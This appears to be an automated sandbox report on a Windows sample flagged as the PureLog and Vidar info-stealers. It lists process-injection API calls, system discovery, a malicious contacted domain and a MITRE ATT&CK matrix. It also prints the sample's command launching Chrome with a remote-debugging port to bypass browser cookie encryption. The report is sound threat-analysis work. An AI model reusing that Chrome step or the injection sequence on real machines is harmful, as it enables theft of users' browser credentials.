HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Code function: 0_2_03128631 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_03128631

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Memory written: C:\Users\user\Desktop\ZT0KQ1PC.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Process created: C:\Users\user\Desktop\ZT0KQ1PC.exe "C:\Users\user\Desktop\ZT0KQ1PC.exe"

Jump to behavior

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Code function: GetLocaleInfoA,

2_2_004266EA

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Queries volume information: C:\Users\user\Desktop\ZT0KQ1PC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Code function: 2_2_004262E0 GetUserNameA,

2_2_004262E0

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Code function: 2_2_00426450 GetTimeZoneInformation,

2_2_00426450

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: ZT0KQ1PC.exe, type: SAMPLE
Source: Yara match	File source: 0.0.ZT0KQ1PC.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZT0KQ1PC.exe.4129550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZT0KQ1PC.exe.4129550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1670042528.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1803422255.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected PureLog Stealer

Source: Yara match	File source: ZT0KQ1PC.exe, type: SAMPLE
Source: Yara match	File source: 0.0.ZT0KQ1PC.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZT0KQ1PC.exe.4129550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZT0KQ1PC.exe.4129550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1670042528.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1803422255.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Create Account	211 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	2 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	Data from Removable Media	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	211 Process Injection	NTDS	2 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Software Packing	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	33 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ZT0KQ1PC.exe	29%	ReversingLabs	Win32.Trojan.Generic
ZT0KQ1PC.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://anglebug.com/43248	0%	Avira URL Cloud	safe
http://anglebug.com/6439$	0%	Avira URL Cloud	safe
http://anglebug.com/4836&	0%	Avira URL Cloud	safe
http://anglebug.com/3965(	0%	Avira URL Cloud	safe
http://anglebug.com/6141L	0%	Avira URL Cloud	safe
https://anglebug.com/7604&	0%	Avira URL Cloud	safe
http://anglebug.com/7488?	0%	Avira URL Cloud	safe
http://anglebug.com/5371#	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
quils.shop	116.203.13.109	true	true	unknown
plus.l.google.com	216.58.212.174	true	false	high
play.google.com	142.250.186.110	true	false	high
t.me	149.154.167.99	true	false	high
www.google.com	142.250.186.68	true	false	high
apis.google.com	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	chrome.exe, 00000006.00000002.2935007726.00004C1C04C68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.google.com/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemdgkjc	chrome.exe, 00000006.00000002.2932323520.00004C1C0451C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2935453841.00004C1C04D74000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/(	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	chrome.exe, 00000006.00000002.2934775621.00004C1C04BB4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com//	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bL	chrome.exe, 00000006.00000002.2935644252.00004C1C04DD0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dl.google.com/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindggfcji	chrome.exe, 00000006.00000002.2932323520.00004C1C0451C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/2	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/1	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/7	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 00000006.00000002.2934708891.00004C1C04B78000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/J	chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone	chrome.exe, 00000006.00000002.2934740063.00004C1C04B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2938295108.00004C1C052E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933575887.00004C1C048A8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4633	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/4	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://csp.withgoogle.com/csp/clientupdate-aus/1Cache-Control:	chrome.exe, 00000006.00000002.2940709414.00004C1C05E96000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/;	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/284462263	chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936971463.00004C1C050CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly	chrome.exe, 00000006.00000002.2933607469.00004C1C048BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934807402.00004C1C04BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934775621.00004C1C04BB4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/B	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpn	chrome.exe, 00000006.00000002.2937510305.00004C1C051B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.gcp.privacysandboxservices.com	chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000006.00000003.1799125696.00004C1C0540C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1800943011.00004C1C0536C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1798971304.00004C1C052F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1801440864.00004C1C05554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1799073454.00004C1C05440000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1800887470.00004C1C04B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1801206345.00004C1C047AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1801355903.00004C1C054E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1799045835.00004C1C053DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1799097522.00004C1C0533C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1800910226.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1800863935.00004C1C0504C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933064485.00004C1C046F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/	chrome.exe, 00000006.00000003.1787448341.00004C1C0489C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/:	chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.aws.privacysandboxservices.com	chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7604&	chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://photos.google.com/settings?referrer=CHROME_NTP	chrome.exe, 00000006.00000002.2935490550.00004C1C04DA3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2935453841.00004C1C04D74000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7714	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/I	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5371#	chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/7488?	chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google-ohttp-relay-join.fastly-edge.com/O	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/L	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/S	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000006.00000003.1801440864.00004C1C05554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1801206345.00004C1C047AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1801355903.00004C1C054E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/tips/	chrome.exe, 00000006.00000002.2937546552.00004C1C051D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934839061.00004C1C04BF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2932680702.00004C1C045E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2935453841.00004C1C04D74000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncan	chrome.exe, 00000006.00000002.2937510305.00004C1C051B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/V	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2	chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6248	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dl.google.com/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmjkmgdlgnkkcocm	chrome.exe, 00000006.00000002.2935644252.00004C1C04DD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000006.00000003.1812954560.00004C1C056C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1813075023.00004C1C05770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1818154218.00004C1C05734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2939212221.00004C1C0570D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1819655378.00004C1C057AC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6929	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/dl/release2/chrome_component/V3P1l2hLvLw_7/7_all_sslErrorAssistant.crx3L	chrome.exe, 00000006.00000002.2939831539.00004C1C05B68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/c	chrome.exe, 00000006.00000003.1822234418.00004C1C0592C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822782821.00004C1C05934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1822275364.00004C1C05930000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5281	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/?feature=ytca	chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/43248	chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://issuetracker.google.com/255411748	chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936971463.00004C1C050CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/u/0/create?usp=chrome_actions	chrome.exe, 00000006.00000002.2933607469.00004C1C048BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934807402.00004C1C04BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934775621.00004C1C04BB4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dl.google.com/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbogdgmfpkhlaaea	chrome.exe, 00000006.00000002.2935644252.00004C1C04DD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 00000006.00000003.1800795809.00004C1C05064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934107230.00004C1C04A1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1797222192.00004C1C052BC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-2.corp.google.com/	chrome.exe, 00000006.00000003.1787448341.00004C1C0489C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000006.00000003.1799125696.00004C1C0540C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1800943011.00004C1C0536C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1798971304.00004C1C052F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1801440864.00004C1C05554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1799073454.00004C1C05440000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1800887470.00004C1C04B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1801206345.00004C1C047AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1801355903.00004C1C054E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1799045835.00004C1C053DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1799097522.00004C1C0533C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1800910226.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1800863935.00004C1C0504C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933064485.00004C1C046F8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/dl/release2/chrome_component/ac6mhlwypzipnufijdvfyhdgvt4q_67/khaoiebndkojlmppe	chrome.exe, 00000006.00000002.2934291583.00004C1C04A94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.google.com/release2/chrome_component/V3P1l2hLvLw_7/7_all_sslErrorAssistant.crx3	chrome.exe, 00000006.00000002.2939831539.00004C1C05B68000.00000004.00000800.00020000.00000000.sdmp	false		high
